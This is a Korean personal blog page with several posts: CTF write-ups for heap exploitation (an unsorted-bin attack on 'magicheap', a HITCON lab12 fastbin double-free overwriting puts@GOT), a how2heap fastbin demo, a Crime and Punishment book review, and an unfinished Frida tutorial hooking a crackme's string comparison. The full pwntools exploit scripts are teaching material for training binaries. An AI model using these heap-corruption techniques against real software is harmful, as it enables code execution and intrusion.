        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        free(heaparray[idx]);
        heaparray[idx] = NULL ;
        puts("Done !");
    }else{
        puts("No such heap !");
    }
 
}



delete_heap에서 메모리 해제 후 배열에 저장되어있는 heap의 포인터를 NULL로 만들어줌으로써, fastbin attack은 가능하지 않습니다. 

3. exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
 
= process('./magicheap')
 
def create_heap(length,contents):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(": ")
    r.sendline(str(length))
    r.recvuntil(":")
    r.sendline(contents)
 
def edit_heap(length, idx, contents):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))
    r.recvuntil(": ")
    r.sendline(str(length))
    r.recvuntil(": ")
    r.sendline(contents)
 
def delete_heap(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))
    
magic = 0x00000000006020c0
fake_chunk = magic - 0x10
 
create_heap(0x80,"tulip")
create_heap(0x20,"sunflower")
create_heap(0x80,"rose")
create_heap(0x20,"tulip")
delete_heap(2)
delete_heap(0)
 
#alloc size = 0x20(idx:1 chunk size) + 0x10(idx:2 header) + 0x10(idx:2 fd, bk)
edit_heap(0x20+0x10+0x101"a"*0x20 + p64(0)+p64(144)+ p64(0)+ p64(fake_chunk))
create_heap(0x80,"5000")
r.sendline("4869")
log.info(r.recv(0x500))
log.info(r.recv(0x100))



exploit코드의 목적은 할당 메모리의 공간을 전역변수 magic으로 만들어 magic의 값을 5000으로 만드는 것입니다.
위에 설명한 코드에 main의 내용은 빠져있지만, 이 전역변수 magic의 값이 4869보다 큰 값이면 문제가 풀리게 되어있습니다.

exploit 코드의 과정은 아래와 같습니다.
1. 0x80, 0x20, 0x80, 0x20 의 크기로 메모리를 할당합니다.
 =>중간에 0x20사이즈를 섞은 것은 하위에 존재하는 free chunk의 bk를 덮기 위해 할당한 메모리입니다.
 => 마지막에 존재하는 0x20사이즈의 chunk를 할당한 것은 이유를 모르겠습니다. 다만, 없으면 정상적으로 exploit이 되지 않네요..
      마지막에 chunk를 할당한 것과 할당하지 않은 것의 메모리를 비교한 화면입니다.


0x603000이 처음으로 할당한 0x80 chunk이고, 0x603090이 두 번째로 할당한 0x20 chunk, 0x6030c0가 세 번째로 할당한 0x80 chunk입니다.

그리고 마지막으로 할당한 0x20 chunk는 0x603150에 위치하고 있습니다.


저 화면은 메모리할당 한 후 39라인까지 실행한 결과(free 2번 실행) 인데, 처음으로 할당한 chunk의 fd가 세 번째 chunk를 가르키고 있고

세 번째 chunk의 bk가 첫 번째로 할당한 chunk를 가르키고 있는 것을 확인할 수 있습니다.



이 화면은 동일한 로직을 마지막 chunk없이 실행한 결과 입니다. fd와 bk가 우리가 예상한 것과는 다른 모습을 하고 있습니다. 서로를 가르키고 있지 않은 모습입니다. 마지막으로 할당 했던 메모리가 어떤 역할을 하는지는 아직 잘 모르지만.. 존재해야지만 0x80 chunk들이 정상적으로 unsorted bin list에 속하는 것으로 보입니다.


2. index 2, 0의 순으로 메모리 해제를 합니다. 

위와 같은 구조에서 우리가 덮어쓸 수 있는 메모리는 두 번째 chunk를 수정하여 세 번째 chunk를 덮어 쓸 수 있습니다. 수정 메모리 크기를 검사하지 않는 탓이기도 하지요. 


세 번째 메모리의 bk는 첫 번째 메모리를 가르키고 있고, 이 주소를 우리가 원하는 magic의 주소로(실제로는 magic의 주소에서 헤더크기(0x10) 만큼 빼준 값)으로 덮어써 magic의 값을 변경할 것입니다.


3. 두 번째 메모리의 데이터 size는 0x20입니다. 그리고 세 번째 메모리의 헤더 사이즈는 0x10, 우리가 덮어쓸 fd와 bk는 각각 0x8이고 

따라서 0x40만큼 덮어 써야 원하는 대로 bk를 완전히 덮어쓸 수 있습니다.


42라인에서 0x40만큼 크기를 입력해주었고, a를 0x20개 만큼 채웠습니다. 그리고 prev_size를 0으로, 현재 chunk사이즈는 본래의 값인 0x90인 144로 채웠습니다. 그리고 fd 값은 0으로 채웠고, bk부분에 우리가 원하는 값인 magic - 0x10 값으로 채워주었습니다.

 

4. 그 이후 새로운 chunk를 요청하여 magic에 값을 써준 후 4869를 입력하여 마무리 되었습니다.






끗!



  1. chaem 2018.08.22 18:04

    마지막 chunk를 할당하는 이유는 처음 chunk를 free할때 top chunk와 합쳐지지 않도록 하기 위해서 인것 같아요! shellfish how2heap에 unsorted bin attack 글이 있는데, 거기에 이게 그거 같아요!!!
    fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
    "the first one during the free()\n\n");

    • JSBach Bach 2018.08.22 22:13 신고

      예ㅎㅎ 저도 얼마전에 알게되었어요! 피드백 감사합니다.

안녕하세요! 세 번째 책 후기 포스팅입니다!

이번에 포스팅 할 책은 도스토예프스키의 책 죄와 벌 입니다.



1. 계기

팟캐스트 지대넓얕에서 채사장님이 소개를 해준 방송을 듣고, 호기심이 생기던 찰나에 유시민 작가님청춘의 독서에 소개되어 읽어봐야겠다고 

생각을 했었습니다. 그러던 중 습관처럼 들렸던 알라딘에서 눈에 들어와 직접적으로 읽는 계기가 되었습니다.


읽기 전 내용을 어느정도 알고있었던 지라 기대를 많이 하고 읽기 시작했지만, 제가 읽었던 책은 비교적 옛날에 번역된 책이라 읽기가 쉽지 않았고 

무엇보다 어마무시한 책의 분량에 읽어갈 수록 지쳤던 것 같습니다. 그래도 흥미로운 주제와 옛날 제정 러시아 시대의 도시를 잘 묘사하여 끝까지 읽을 수 있었습니다. 


책을 모두 읽고 이 후기를 쓰려고 했을 때 너무 많은 내용과 생각이 뒤섞여 쓰기가 어려워 유시민 작가님청춘의 독서 죄와 벌 파트를 다시 읽어 참고하였습니다.


2. 내용

죄와 벌은 주인공인 라스콜리니코프를 기점으로 이야기가 전개됩니다. 

휴학생인 라스콜로니코프는 본래 선행을 많이 하고 자기 주장이 강한 학생입니다. 하지만 소설의 초반부 고리대금 전당포를 운영하는 노파를 살해합니다. 살해 전 살해 방법과 살해한 후 도주경로 등 철저하게 준비하죠. 그리고 우연하게 마주친 노파의 이복동생까지 어쩔 수 없이 살해하고 맙니다. 살해하고 금품을 훔쳐 달아나는 모습을 봤을 때 까지만 해도 그저 생활고에 시달리다 노파를 살해한 것인가? 전에 들었던 시나리오는 이게 아니였던거 같은데.. 라는 생각이 들 때 쯤, 뒤편에 범죄에 대하여 라는 주인공이 쓴 논문이 소개됩니다.


- 선한 목적을 위한 악한 수단이 정당화 되는가?

범죄에 대하여 라는 소설 중 논문에는 사회악을 없애고 공동선을 추구할 수 있는 방법에 대해 이야기 하고있습니다. 

사실 이 논문의 내용이 소설 전반적인 주제라고 봐도 될 것 같습니다. 이 논문에서는 사람들을 평범한 사람비범한 사람으로 나눕니다. 


평범한 사람은 그저 평범한 인간이기에 법을 준수하고, 순종하며 살아가야합니다. 비범한 사람은 모든 종류의 법규로부터 자유롭습니다. 그의 신념을 위해 즉, 공공선을 이루기 위해 살인이나 폭력 등이 정당화 된다는 것이지요. 주인공은 예시로 나폴레옹, 마호메트, 솔로몬 등을 예로 듭니다.


위 내용은 선한 목적을 위해 악한 수단이 정당화 되는가? 로 볼 수 있지요. 죄와 벌에서는 그 대답은 정당화 되지 않는다. 라고 암시 하고 있습니다.

명확하게 명시한 것은 아니지만, 범죄 이후 줄곧 라스콜로니코프는 정신적으로 고통을 겪고, 스스로 벌을 받는 것과 같은 상태에 빠져 괴로워 합니다.

아마도 이 점을 이야기 하고 싶었던 것 같습니다.


저도 이 문제에대해 많은 고민을 해보았고, 제가 생각한 결론도 위와 크게 다르지 않습니다.

그 이유로 첫 째로는 선한 목적을 이루는 수단 중 악한 수단만이 있는 것만은 아닐 것이며, 둘 째 선한 수단은 비교적 느리고 비효율적일 순 있으나 누군가 불행해지지 않습니다. 또한, 악한 수단이라고 판단 되는 것은 도덕적으로 나쁜 것이고 위와 같이 누군가 불행해지거나 피해를 보는 수단일 것인데 이러한 것의 결과가 선하다고 볼 수는 없을 것이기 때문입니다.


 

- 비정상적인 인물들을 등장인물로 채택한 이유?

전반적으로 걸쳐 서술되는 도시와 각 등장인물들은 모두 음울하고 불안한 분위기가 있습니다. 특히 주인공을 포함한 등장인물들 대부분 심신에 고질적인 문제점을 가지고 있습니다. 물론 주인공의 친구 라주마힌이나 동생 두냐, 어머니와 같이 정상적으로 묘사되는 인물들도 있지만 술주정뱅이, 창녀, 오만한 귀족, 바람둥이, 정신착란 증세, 허풍쟁이 등등 다양하게 정상 범주를 벗어난 인물들이 많습니다.


청춘의 독서와 죄와 벌 책의 뒷 편에 위치 하고있는 해설편에서는 이러한 이유를 도스토예프스키의 생애와 연결시켜서 설명하고 있습니다.

도스토예프스키는 도박을 좋아했고, 충동적이며 낭비벽이 심했다고 합니다. 비교적 부유한 집안이였음에도 불구하고 재산을 모두 날려먹었죠.

또, 당시 사회주의에 연관되어 사형을 선고받고 수용소에 갇히는 등 순탄하지 않은 삶을 살았고 이 때문에 소설들의 등장인물들이 영향을 받았다라고 합니다.


하지만 저는 다른 관점에서 보려고 합니다. 

조금은 비뚤어지고 정서적으로 불안하며 음울한 분위기를 풍기는 등장인물들을 통해 당시 사회를 비판하려했던 것이 아닐까 라고 생각해봅니다.   

루진을 통해 시대의 흐름을 탄 졸부들을 비판하기도 하고, 레베쟈트니코프를 통해 겉만 번지르르한 개혁 지식인들을 풍자하며 소냐의 가족들을 통해 몰락한 귀족의 모습이나 가난한 시민들의 처참한 모습을 보여주려고 한 것이라는 생각을 해보았습니다.


3. 마무리

좁혀오는 포르피리의 수사망과 자신의 죄를 스스로 감당하지 못하여 발생하는 열병, 정신착란으로 라스콜리니코프는 결국 자수를 하고, 소냐는 라스콜리니코프의 옥바라지를 합니다. 옥 중 주인공은 지극정성으로 자신을 도와주는 소냐에게 마음을 열고 자신의 죄를 받아들인 모습을 보입니다. 종교에 대해 콧방귀도 뀌지 않던 사람이 소냐에게 성경책을 부탁하는 모습도 나옵니다.


그 뒷이야기는 서술되지 않고 있지만 왜곡된 방법으로 정의를 실현하고자 했던 라스콜리니코프가 자신의 죄를 뉘우친 것으로 묘사 되고 있으니, 

석방 후 소냐와 동생, 라주마힌과 함께 행복하게 살았기를 바래봅니다.

 

'일상 > BooK' 카테고리의 다른 글

라틴어 수업 - 나는 공부하는 노동자입니다.  (0) 2018.03.22
죄와 벌  (0) 2018.02.26
우리는 언젠가 만난다.  (0) 2018.01.15
시민의 교양  (0) 2018.01.11

1. 시작하기전에...

저번 포스팅(http://bachs.tistory.com/entry/HITCON-Training-lab12-Fastbin-Attack?category=961837)에 이어 fastbin attack에 대해 포스팅 하려고합니다.

이번 글에서는 HITCON Training lab12를 풀어보겠습니다.



2. 분석

문제에서 주어진 소스코드 secretgarden.c 를 살펴보겠습니다. 소스코드가 길어 필요한 부분만 분석하겠습니다.(환경은 64bit 입니다.)


1
2
3
4
5
6
7
8
9
struct flower{
    int vaild ;             //8byte
    char *name ;            //8byte
    char color[24] ;        //24byte
};
                            //40byte
 
struct flower* flowerlist[100];    //list of flowers
unsigned int flowercount = 0;     //count of flowers 



먼저 flower 구조체가 있습니다. flower구조체는 꽃(flower구조체)의 유효성을 검증해주는 valid 변수가 있고, 꽃의 이름을 입력받는 변수 name이 있습니다.

마지막으로 꽃의 색을 저장하는 24바이트짜리 char 배열 color 변수를 멤버로합니다. 이 구조체의 총 크기는 40바이트입니다.


전역변수로는 전체 꽃의 개 수를 세기 위한 flowercount가 있고, 꽃들을 관리할 수 있는 flower * 배열이 있습니다.


다음은 함수들을 살펴보도록 하겠습니다. 모든 함수를 다루기엔 내용이 너무 많아, 취약점이 발생 할 수 있는 함수인 add()와 del()만 살펴보겠습니다.


int add()

=> add함수의 동작은 아래와 같습니다.  

전역변수 flowercount가 100보다 크면 "The garden is overflow" 출력합니다.

flowercount가 100보다 작으면

- 추가 할 flower구조체에 메모리를 할당하고 초기화 합니다.

flower name 의 크기를 입력 받은 후 크기만큼 buf 메모리를 할당합니다.

- flower name을 입력받아 buf에 저장합니다.

- flower 구조체 name 멤버변수에 buf 포인터를 대입합니다.

- flower 구조체 color 멤버변수에 입력 받습니다.

- flower 구조체 valid 변수 1로 setting합니다.

- 전역변수 flowerlist를 검색하여 비어있는 곳에 생성한 flower 를 추가합니다.

- 전역변수 flowercount를 1 증가시킨 후, "Successful !" 출력합니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int add(){
    struct flower *newflower = NULL ;
    char *buf = NULL ;
    unsigned size =0;
    unsigned index ;
    if(flowercount < 100){
        newflower = malloc(sizeof(struct flower));
        memset(newflower,0,sizeof(struct flower));
        printf("Length of the name :");
        if(scanf("%u",&size)== EOF) exit(-1);
        buf = (char*)malloc(size);
        if(!buf){
            puts("Alloca error !!");
            exit(-1);
        }
        printf("The name of flower :");
        read(0,buf,size);
        newflower->name = buf ;
        printf("The color of the flower :");
        scanf("%23s",newflower->color);
        newflower->vaild = 1 ;
        for(index = 0 ; index < 100 ; index++ ){
            if(!flowerlist[index]){
                flowerlist[index] = newflower ;
                break ;
            }
        }
        flowercount++ ;
        puts("Successful !");
    }else{
        puts("The garden is overflow");
    }
}



int del()

flowercount가 0이면 "No flower in the garden" 출력합니다.

flowercount가 0이 아니면 "Which flower do you want to remove from the garden:" 를 출력 한 후 지울 index를 입력받습니다.

  입력받은 인덱스의 유효성 검사(0 ~ 100의 범위 외) 이거나 해당 인덱스에 값이 없는 경우 

- "Invalid choice" 출력 후 프로그램을 종료합니다.

위의 경우가 아니면

- 해당 인덱스의 구조체 valid 멤버변수를 0으로 setting합니다.

- 해당 인덱스의 구조체 name 멤버변수의 메모리를 해제합니다.

- "Successful" 출력

- 구조체는 메모리 해제하지 않으며, flowerlist에서도 지우지 않습니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int del(){
    unsigned int index ;
    if(!flowercount){
        puts("No flower in the garden");
    }else{
        printf("Which flower do you want to remove from the garden:");
        scanf("%d",&index);
        if(index < 0 ||index >= 100 || !flowerlist[index]){
            puts("Invalid choice");
            return 0 ;
        }
        (flowerlist[index])->vaild = 0 ;
        free((flowerlist[index])->name);
        puts("Successful");
    }
}



fastbin attack이 가능한 조건은 아래와 같습니다.


- 동일한 크기의 Fast chunk의 할당과 해제가 자유로워야한다.

- 공격자에 의해 해제된 Fast chunk를 한번 더 해제 할 수 있어야 한다.(Double Free Bug)

- 공격자에 의해 할당된 Fast chunk 영역에 값을 저장 할 수 있어야 한다.

- 할당 받고자 하는 메모리 영역에 해제된 Fast chunk의 크기 값이 저장되어 있어야한다.


소스코드를 분석해 보았을 때, add()함수 내에서 크기 값을 입력하여 Fast chunk의 할당이 자유롭고 할당된 메모리 내에 값을 쓸 수 있으며 

del()함수를 통해 메모리 해제 역시 자유롭습니다. 앞선 포스팅에서 봤듯이 메모리를 할당한 후 a -> b -> a의 형태로 메모리 해제를 하면,

fastbin attack이 가능 할 것으로 보입니다.


3. Exploit 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['terminator','-x','bash','-c']
= process('./secretgarden')
 
def raiseflower(length,name,color):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(length))
    r.recvuntil(":")
    r.sendline(name)
    r.recvuntil(":")
    r.sendline(color)
 
def visit():
    r.recvuntil(":")
    r.sendline("2")
    
def remove(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))
 
def clean():
    r.recvuntil(":")
    r.sendline("4")
    
magic = 0x400c7b 
fake_chunk = 0x601ffa
 
raiseflower(80,"tulip","red")#0
raiseflower(80,"rose","blue")#1
remove(0)
remove(1)
remove(0)
raiseflower(80,p64(fake_chunk),"blue")
raiseflower(80,"sunflower","red")
raiseflower(80,"bach","green")
raiseflower(80"a"*6 + p64(0+ p64(magic)*2 ,"red")#malloc in fake_chunk
 
r.interactive()



exploit 코드를 살펴보겠습니다.

코드의 메인 아이디어는 호출 하고 싶은 함수(magic)의 주소를 적어두고, 이 주소를 puts함수의 got에 써주어 exploit을 하려고합니다.


첫 번째로 35 ~ 39라인 에서 메모리를 두 개 할당 하여 a->b->a의 순서로 메모리를 해제하였습니다.

그리고 puts의 got(0x602020)에 써주기 위해 fake_chunk를 0x601ffa를 선정하였는데 이유는 80바이트(0x50) + chunk header(0x10)값이 적힌 곳

써주어야 하기 때문입니다. 이 부분이 이해가 안간다면 앞에 포스팅 한 글에서 chunk사이즈를 맞춰주어야 한다는 부분을 다시 보고오시기 바랍니다.


 


0x601ffa의 주소를 출력한 화면입니다. 0x601ffa + 0x8에 0xe150000000000060 값이 쓰여져 있습니다.

이 곳에 설명한대로라면 0x0000000000000060 값이 써져있어야 하지만 상위 바이트에 다른 값이 추가로 더 붙어있음을 알 수 있습니다.

운영체제에서 검사하는 메모리의 크기는 하위 4바이트를 이용해 확인하기 때문에 상위 4바이트에 있는 값은 무시할 수 있습니다.

이에 대해 자세한 내용은 http://veritas501.space/2017/05/23/HITCON-training%20writeup/ 의 lab12파트를 확인해주시기바랍니다.


따라서 0x601ffa를 fake_chunk의 주소로 선정해주어 메모리를 할당 받고 사용할 수 있는 주소는 0x60200a부터입니다.

0x602020에 값을 덮어쓰기 위해서는 0x602020 - 0x601ffa = 0x16(22) 이고, 따라서 앞의 dummy가 22바이트 필요합니다.


43라인에서 "a"*14 + p64(magic)*2 를 하여(6byte + 8byte + 16byte) 26byte를 써 magic함수가 0x602020에 써질 수 있도록

페이로드를 작성하였습니다.

 

끗!


  1. 123123 2019.01.14 18:04

    더미가 22필요한데 왜 a를 14개만 쓴거죠?

    • JSBach Bach 2019.01.15 00:03 신고

      앗 좋은 질문 감사합니다.
      익스플로잇 코드와 설명이 다른 부분이 있었네요
      익스플로잇 코드 43라인보면
      "a"*6 + p64(0) + p64(magic)*2 를 보냅니다 ㅠ

      익스플로잇 코드에서는
      a*6 = 6byte
      p64(0) = 8byte
      p64(magic)*2 = 16byte(dummy + 덮어쓸 주소)

      설명에서는
      a*14 = 14byte
      p64(magic)*2 = 16byte(dummy + 덮어쓸 주소)

      즉, magic이 두번인데, 더미와 실제 덮어쓰는 용도로 썼습니다. 정확도를 높이기위해서 이렇게 쓴것이고, 말씀하신대로 그냥 a*22로 해도 익스플로잇 될것 같네요 :)

1. 시작하기전에...

이번 문제에 대한 포스팅은 내용이 길어질 것 같아서 두 개로 분할해서 포스팅하려고합니다.

먼저 이 글에서는 Allocated Chunk(할당된 Heap)의 형태와 Free Chunk(해제된 Heap)을 알아본 후 how2heap의 예제를 통해 Fastbin Attack의 개념을 적어보려고합니다.

이후 다음 포스팅에서 HITCON Taining lab12의 문제의 라이트업을 쓰도록 하겠습니다.


1-1. Allocated Chunk

메모리가 할당이 되면 아래와 같은 모습을 같는 chunk가 생성됩니다.

맨 위에서부터 차례로 설명을 해보겠습니다. 32bit에서는 4byte, 64bit에서는 8byte로 메모리 상 자신 보다 이전의 chunk의 크기를

저장하는 prev_size필드가 존재합니다. 테스트 해본 결과 앞에 있는 chunk가 없다면 0으로 set되는 것을 확인하였습니다.


그 다음으로 오는 필드는 자기 자신의 크기를 기록합니다. 유저가 사용하는 영역뿐만 아니라 그림에 표현된 chunk 전체의 크기이며,

마지막 3bit는 이전 청크 혹은 현재 청크의 상태를 표현하기 위한 flag로써 사용하는데 자세한 내용은 생략하겠습니다.


위 두 필드를 지나면 사용자가 할당받아 사용하는 공간이 위치합니다. 그리고 마지막으로는 binlist상 다음에 존재하는 chunk의 크기가 기록됩니다.


OS 사용주소 라고 적어놓은 뜻은 binlist에서 관리되는 chunk의 주소를 표현하고 싶어서 저렇게 적어 놓았고,

User 사용주소 라고 적은 것은 실제로 유저가 메모리를 받을 때(malloc, calloc 등을 통해) 리턴 받는 주소라 User사용 주소로썼습니다.


 

1-2. Free Chunk

메모리가 해제된 Chunk는 Allocated Chunk와 비슷하지만 다른 형태를 갖습니다.

상위 두 필드는 같은 용도로써 유지되지만 User사용 영역이였던 곳이 binlist에서 앞 뒤 chunk를 가르키는 포인터 값이 저장 됩니다.

fastbin 같은 경우에는 single linked list이기때문에, forward pointer to next chunk in list(fd)영역에만 값이 쓰여지고 back pointer to next chunk in list(bk)는 필드는 존재하지만 값이 세팅 되지 않습니다.


size of chunk의 하위 3bit flag에 대한 내용을 포함한 더 자세한 사항은 아래 링크 첨부해 드립니다.

[참조] https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_chunk.html (영문)

[참조] https://www.lazenca.net/pages/viewpage.action?pageId=1147929 (한글)


2. how2heap - fastbin_dup_into_stack


how2heap에 fastbin attack에 대한 내용을 코드로 설명을 한 것이 있어 이 것을 같이 보려고합니다.


아래는 fastbin_dup_into_stack.c 의 코드입니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#include <stdio.h>
#include <stdlib.h>
 
int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
           "returning a pointer to a controlled location (in this case, the stack).\n");
 
    unsigned long long stack_var;
 
    fprintf(stderr, "The address we want malloc() to return is %p.\n"8+(char *)&stack_var);
 
    fprintf(stderr, "Allocating 3 buffers.\n");
    int *= malloc(8);
    int *= malloc(8);
    int *= malloc(8);
 
    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);
 
    fprintf(stderr, "Freeing the first one...\n");
    free(a);
 
    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);
 
    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);
 
    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);
 
    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
        "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    unsigned long long *= malloc(8);
 
    fprintf(stderr, "1st malloc(8): %p\n", d);
    fprintf(stderr, "2nd malloc(8): %p\n"malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
        "so that malloc will think there is a free chunk there and agree to\n"
        "return a pointer to it.\n", a);
    stack_var = 0x20;
 
    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    *= (unsigned long long) (((char*)&stack_var) - sizeof(d));
 
    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n"malloc(8));
    fprintf(stderr, "4th malloc(8): %p\n"malloc(8));
}


 

fastbin attack의 목적은 메모리 할당을 받는 공간을 우리가 원하는 곳으로 컨트롤 하기 위함입니다. 예를 들어 stack공간이라던지, got 테이블이라던지

원하는 공간에 메모리를 할당 받아서 사용할 수 있다는 것입니다.


14 ~ 16라인에서 세 개의 메모리를 할당 받았습니다. (a, b, c) 그 후 메모리 해제를 하는데 순서는 a -> b -> a로 해제를 합니다.

그 이유는 해제된 메모리를 연달아서 해제 할 수 없기 때문인데, fastbin에서는 binlist에 top에 있는 주소를 검사하여 해당 주소는 해제 할 수 없게 되어있습니다. 그래서 a를 두 번 해제하기 위해 a -> b -> a의 순서로 해제 하는 것입니다. 왜 a를 두번 해제 해야하는 지는 아래에서 다시 설명하겠습니다.


지금까지 진행 된 상황에서 fastbin list의 모습을 그려보도록 하겠습니다.



a와 b는 현재 free된 상태이니 Free Chunk의 구조를 가지게 될 것입니다. 또한 a, b, c는 크기가 작아 fastbin에 속하니 fastbin list이기 때문에 single linked list에 속하게 됩니다.


맨 처음 해제 된 a는 FD에 b의 주소를 가르키고 b의 FD는 a를 가리키는 모습이 됩니다. 이 상태에서 36 라인에서 부터 메모리를 다시 할당 하기 시작합니다. 


처음 메모리를 요청 받으면 a의 주소를 리턴해줍니다. 다음에 메모리를 요청 받았을 때 리턴해 줄 주소는 a의 FD에 적혀있는 b의 주소입니다.

다음 메모리를 요청 받으면 b의 주소를 리턴해줍니다. 다음에 메모리를 요청 받았을 때 리턴해 줄 주소는 b의 FD에 적혀있는 a의 주소입니다.


현재는 Tail쪽에 있는 a의 FD에는 값이 없습니다. 하지만 처음 메모리를 요청 했을 때 a를 리턴 받기 때문에 우리가 핸들링 할 수 있습니다.

메모리를 할당 받은 후 a의 FD에 우리가 원하는 주소 값을 써준다면 우리가 원하는 곳의 메모리를 할당 받을 수 있는 것입니다.

FD에 우리가 원하는 주소 값을 써주는 것은 특별한 테크닉이 필요한 것은 아닙니다. 왜냐하면 해제된 메모리의 FD필드는 할당받은 메모리의

contents에 해당하기 때문에 그저 주소 값을 적어주면 됩니다.


여기서 한 가지 놓치지말아야 할 점은 해당 공간에 size of chunk를 맞춰 주어야 한다는 것입니다.

이 예제에서는 stack_var = 0x20 이라는 것으로 size를 맞춰 주고있습니다.


64bit환경에서 a,b,c는 8바이트를 할당 받아서 chunk의 크기는 0x20 = 32byte입니다.

size of previous chunk = 8byte

size of chunk = 8byte

contents = 8byte

next chunk size = 8byte 로 최소 할당 사이즈입니다. (32bit환경은 16byte)


우리가 사용하고 싶은 주소 - 16byte를 a에 써주고, 우리가 사용하고 싶은 주소 - 8byte에 할당 받는 사이즈를 맞춰주는 사전작업을해야

원하는 공간에 메모리를 할당 받을 수 있습니다.  

이러한 이유로 48라인에서 stack_var의 주소 - 8byte로 d의 값을 지정하고 스택공간에 메모리를 할당 받게 한 것입니다.




끗!


=====

2018.02.27 prev_size관련 수정


지난번 iOS Hooking관련 포스팅을 진행하면서 Frida를 소개해드린 바 있습니다.

[링크] http://bachs.tistory.com/entry/iOS-Hooking2Frida?category=892887


전에 언급했던 것처럼 Frida는 iOS뿐만아니라 Android와 Windows에서도 활용할 수 있는데요, 오늘은 Windows에서 활용하는 방법에 대해서 

포스팅을 해보려고 합니다. 예제는 코드엔진의 Basic level03 문제를 이용하였습니다.

[링크] http://codeengn.com/challenges/basic/03


1. 분석

예제 프로그램을 실행하면, 영어인듯 하지만 영어는 아닌것으로 보이는 알럿이 뜹니다.


 

여기서 취소를 누르면 그대로 프로그램을 종료되고, 확인을 누르면 진행이 됩니다.





위의 알럿창에서 뭐라고 이야기했는지 정확히는 모르지만 실행결과를 보니 Regcode를 입력해서 인증을 하는 프로그램인듯 합니다.

더불어 이 예제의 목적은 Regcode를 모르는 상태에서 이 프로그램을 크래킹해내는 것이겠죠.


여기까지를 보고 예상해볼 수 있는 점은 입력 기대값이 있고, 입력값과 비교해서 성공/실패여부를 반환할 것이라는걸 알 수 있습니다.

그리고 이 예제 프로그램이 통신을 하지 않는 것으로 보이니 파일안에 입력 기대값이 존재하거나 로컬에 존재하는 어떤 파일안에 존재할 가능성 등을 

생각해 볼 수 있습니다.  


자세한 건 IDA로 열어서 imports subview를 한번 봅시다.



보다시피 MSVBVM50이라는 라이브러리에서만 참조하는 것으로 보이네요. 검색을 해보면 MSVBVM50.dll은 Visual Basic으로 개발된 프로그램이

참조하는 dll이라는 것을 알 수 있습니다. 또한 목록에서 볼때는 일단 fopen같은 함수가 보이지 않으니, 입력 기대값이 실행 바이너리 안에 존재할 가능성이

더 높아졌네요.


입력값과 입력기대값을 비교하기위해 문자열 비교함수를 사용했을 가능성이 크니 해당 함수를 기점으로 분석 포인트를 잡는 것이 좋을 것같습니다.

import 함수 목록 중 __vbaStrCmp를 포인트로 잡아 보겠습니다.



__vbaStrCmp 함수의 레퍼런스를 찾아보니 두 군데가 나오고 있습니다. 위의 화면은 두 곳 중 더 상위주소에 있는 곳으로 이동한 화면입니다.

__vbaStrCmp 함수를 호출하기전에 ebp-58과 "2G83G35Hs2"라는 문자열을 함수의 인자로 사용하기 위해 push해주고 있는 모습입니다.

이 것을 보고  ebp-58에 우리가 입력한 입력값이 존재하고 "2G83G35Hs2"가 입력 기대값임을 알 수 있습니다.



오, 기대 입력 값은 잘 찾은거 같네요! 하지만 이번에는 Windows후킹에대해 포스팅을 하는 거니까 후킹으로 풀어봅시다.

일단, 우리가 후킹을 걸 메서드는 MSVBVM50.dll 의 __vbaStrCmp()이고, 리턴 값을 조작해주면 될거 같아요.


2. 후킹

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
from __future__ import print_function
import frida
import sys
 
def on_message(message, data):
    print("[%s] => %s" % (message, data))
 
def main(target_process):
    session = frida.attach(target_process)
    #print([x.name for x in session.enumerate_modules()])
  
    script = session.create_script("""
    var baseAddr = Module.findBaseAddress('MSVBVM50.dll');
    console.log('MSVBVM50.dll baseAddr: ' + baseAddr);
    //"use strict";
    const __vbaStrCmp = Module.findExportByName("MSVBVM50.dll", "__vbaStrCmp");
    Interceptor.attach(__vbaStrCmp, {
        onEnter: function (args) {
